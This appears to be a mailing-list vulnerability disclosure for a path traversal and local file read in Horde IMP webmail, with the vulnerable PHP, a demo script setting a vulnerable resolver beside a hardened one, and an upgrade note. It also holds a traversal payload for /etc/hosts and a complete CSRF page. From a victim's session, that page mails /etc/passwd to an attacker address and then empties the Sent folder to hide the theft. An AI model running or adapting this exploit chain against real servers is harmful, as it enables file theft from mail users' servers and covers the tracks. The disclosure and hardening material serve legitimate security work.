This is my first time sending to a mailing list, so I've chosen
something easy. Here goes:
Summary: Horde Groupware's IMP webmail component contains a path
traversal / local file read vulnerability in its handling of HTML
message bodies. Any file readable by the web server process can be
read and attached to an outgoing message, which could be exploited
to escalate privileges or bypass authentication (through CSRF if the
attacker is unauthenticated).
The vulnerable code, reached when IMP walks the DOM of an outgoing HTML message ($src is the src attribute of the current <img> node), is:
--
} elseif (strcasecmp($node->tagName, 'IMG') === 0) {
    /* Check for smileys. They live in the JS directory, under
     * the base ckeditor directory, so search for that and replace
     * with the filesystem information if found (Request
     * #13051). Need to ignore other image links that may have
     * been explicitly added by the user. */
    $js_path = strval(Horde::url($registry->get('jsuri', 'horde'), true));
    if (stripos($src, $js_path . '/ckeditor') === 0) {
        $file = str_replace(
            $js_path,
            $registry->get('jsfs', 'horde'),
            $src
        );
        if (is_readable($file)) {
            $data_part = new Horde_Mime_Part();
            $data_part->setContents(file_get_contents($file));
            ...
--
As seen, we control $file: it is derived directly from the src attribute of <img src="">. $js_path is the absolute URL of Horde's JS directory (e.g. https://webmail.foo.com/js), and the only check is a case-insensitive prefix match against $js_path . '/ckeditor'. The str_replace() then swaps that URL prefix for the filesystem path of the JS directory ($registry->get('jsfs', 'horde')) without canonicalising the result, so any ../ segments after /ckeditor survive into is_readable() and file_get_contents(). The file contents end up in a Horde_Mime_Part of the outgoing message, so they leave the server with the mail. To reach the sink we only have to satisfy the stripos() check. Our (elementary) exploit is thus:
--
<img src="https://webmail.foo.com/js/ckeditor/../../../../../../etc/hosts">
--
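The following is an added example, not Horde code and not the upstream fix. It reproduces the URL-to-filesystem mapping from the snippet above in a stand-alone PHP script, runs it against a legitimate smiley URL, the traversal from the advisory and an unrelated external image, and puts a canonicalising version beside it. The jsuri/jsfs values, the temporary directory layout and the "secret" file are all constructed for the demo; on a real install they come from $registry and the server's filesystem.

```php
<?php
// Added example (not Horde/IMP code): the vulnerable mapping next to a hardened one.
// Assumed value for strval(Horde::url($registry->get('jsuri', 'horde'), true)).
$jsUrl = 'https://webmail.foo.com/horde/js';

// Throwaway tree so the script runs offline. $jsFs stands in for
// $registry->get('jsfs', 'horde'); secret.txt stands in for /etc/hosts.
$root = sys_get_temp_dir() . '/imp-demo-' . getmypid();
$jsFs = $root . '/horde/js';
mkdir("$jsFs/ckeditor/plugins/smiley", 0700, true);
file_put_contents("$jsFs/ckeditor/plugins/smiley/smile.gif", 'GIF89a');
file_put_contents("$root/secret.txt", 'constructed secret');

// Vulnerable shape: prefix match on the URL, textual replace, no canonicalisation.
function resolveVulnerable(string $src, string $jsUrl, string $jsFs): ?string {
    if (stripos($src, $jsUrl . '/ckeditor') !== 0) {
        return null;                       // "other image links ... added by the user"
    }
    $file = str_replace($jsUrl, $jsFs, $src);
    return is_readable($file) ? $file : null;
}

// Hardened shape (suggested approach, not the 7.0.1 patch): take only the part
// after the ckeditor prefix, canonicalise it, and require the result to stay
// inside the ckeditor directory.
function resolveHardened(string $src, string $jsUrl, string $jsFs): ?string {
    $prefix = $jsUrl . '/ckeditor/';
    if (stripos($src, $prefix) !== 0) {
        return null;
    }
    $base = realpath($jsFs . '/ckeditor');
    if ($base === false) {
        return null;
    }
    $rel = rawurldecode(preg_replace('/[?#].*$/', '', substr($src, strlen($prefix))));
    $real = realpath($base . '/' . $rel);  // resolves ../ and %2e%2e after decoding
    if ($real === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;                       // escaped the ckeditor tree, or no such file
    }
    return (is_file($real) && is_readable($real)) ? $real : null;
}

$cases = [
    $jsUrl . '/ckeditor/plugins/smiley/smile.gif',   // legitimate smiley
    $jsUrl . '/ckeditor/../../../secret.txt',        // traversal, as in the advisory
    'https://evil.example/ckeditor/x.gif',           // unrelated image, must be ignored
];
foreach ($cases as $src) {
    printf("%-62s vuln=%s\n%-62s hard=%s\n", $src,
        resolveVulnerable($src, $jsUrl, $jsFs) ?? '-', '',
        resolveHardened($src, $jsUrl, $jsFs) ?? '-');
}

// Tidy up the throwaway tree.
unlink("$jsFs/ckeditor/plugins/smiley/smile.gif");
unlink("$root/secret.txt");
foreach (["$jsFs/ckeditor/plugins/smiley", "$jsFs/ckeditor/plugins", "$jsFs/ckeditor",
          $jsFs, "$root/horde", $root] as $dir) {
    rmdir($dir);
}
```

Run with `php demo.php`. The smiley resolves under both functions; the traversal case resolves to the file outside the JS tree only under resolveVulnerable(), because str_replace() keeps the ../ segments and file_get_contents() happily follows them, while resolveHardened() rejects it after realpath(). Note that the number of ../ segments needed to reach a given file depends on how deep jsfs sits on the target; extra segments at the root are harmless, so over-shooting is the safe choice when probing.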
This is likely very chainable with any other existing primitive to
achieve RCE on Horde IMP. For example, here is an easy CSRF chain: from
the victim's logged-in session it sends a message carrying the payload
to an attacker-controlled address (the read file is attached to that
message), then empties the Sent folder to hide the evidence:
--
<!DOCTYPE html>
<html>
<body>
<h1>yo</h1>
<script>
// Step 1: as the victim, send an HTML message whose <img> src matches the
// ckeditor prefix. IMP resolves the traversed path and attaches the file.
var p1 = new FormData();
p1.append('to', '[email protected]');
// land in spam
p1.append('subject', 'hai');
p1.append('html', '1');
// Adjust the number of ../ segments to the depth of the Horde JS directory
// on the target's filesystem; extra segments at the root are harmless.
p1.append('message',
  '<html><body>bye<img src="http://targ/horde/js/ckeditor/../../../../etc/passwd"></body></html>');
p1.append('identity', '0');
p1.append('priority', 'normal');
p1.append('request_read_receipt', '0');
p1.append('save_sent_mail', '1');
fetch('http://targ/horde/services/ajax.php/imp/sendMessage', {
  method: 'POST',
  body: p1,
  credentials: 'include',   // ride the victim's session cookie
  mode: 'no-cors'           // opaque response is fine, we never read it
})
.then(() => {
  console.log("* bye");
  // Step 2: two seconds later, empty the Sent folder so the victim does
  // not notice the message. 'U0VOVA' is the (unpadded) base64 of "SENT".
  setTimeout(() => {
    var p2 = new FormData();
    p2.append('mbox', 'U0VOVA'); // b64 SENT
    // delete
    fetch('http://targ/horde/services/ajax.php/imp/emptyMailbox', {
      method: 'POST',
      body: p2,
      credentials: 'include',
      mode: 'no-cors'
    });
  }, 2000);
});
</script>
</body>
</html>
--
PATCH:
Update to Horde IMP 7.0.1, which contains the fix.